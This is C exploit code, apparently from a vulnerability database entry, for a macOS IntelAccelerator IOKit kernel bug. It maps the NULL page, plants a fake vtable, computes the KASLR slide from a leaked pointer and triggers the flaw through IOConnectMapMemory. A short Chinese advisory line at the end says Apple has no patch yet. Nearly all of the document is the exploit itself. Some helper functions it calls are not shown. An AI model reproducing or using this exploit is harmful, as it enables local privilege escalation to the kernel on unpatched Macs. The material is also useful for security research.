void trigger(void* vtable, size_t vtable_len){
//need to overallocate and touch the pages since this will be the stack:
mach_vm_address_t addr = 0x41420000 - 10 * 0x1000;
mach_vm_allocate(mach_task_self(), &addr, 0x20*0x1000, 0);
memset(addr, 0, 0x20*0x1000);
memcpy((void*)0x41420000, vtable, vtable_len);
//map NULL page
vm_deallocate(mach_task_self(), 0x0, 0x1000);
addr = 0;
vm_allocate(mach_task_self(), &addr, 0x1000, 0);
char* np = 0;
for (int i = 0; i < 0x1000; i++){
np[i] = 'A';
}
volatile uint64_t* zero = 0;
*zero = 0x41420000;
//trigger vuln
CFMutableDictionaryRef matching = IOServiceMatching("IntelAccelerator");
io_iterator_t iterator;
kern_return_t err = IOServiceGetMatchingServices(kIOMasterPortDefault, matching, &iterator);
io_service_t service = IOIteratorNext(iterator);
io_connect_t conn = MACH_PORT_NULL;
err = IOServiceOpen(service, mach_task_self(), 2, &conn);
addr = 0x12345000;
mach_vm_size_t size = 0x1000;
err = IOConnectMapMemory(conn, 3, mach_task_self(), &addr, &size, kIOMapAnywhere);
}
int main() {
uint64_t leaked_ptr = leak();
uint64_t kext_load_addr = load_addr();
// get the offset of that pointer in the kext:
uint64_t offset = leaked_offset_in_kext();
// sanity check the leaked address against the symbol addr:
if ( (leaked_ptr & 0xfff) != (offset & 0xfff) ){
printf("the leaked pointer doesn't match up with the expected symbol offset\n");
return 1;
}
uint64_t kaslr_slide = (leaked_ptr - offset) - kext_load_addr;
printf("kaslr slide: %p\n", kaslr_slide);
size_t vtable_len = 0;
void* vtable = build_vtable(kaslr_slide, &vtable_len);
trigger(vtable, vtable_len);
return 0;
}
建议:
厂商补丁:
Apple
-----
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本: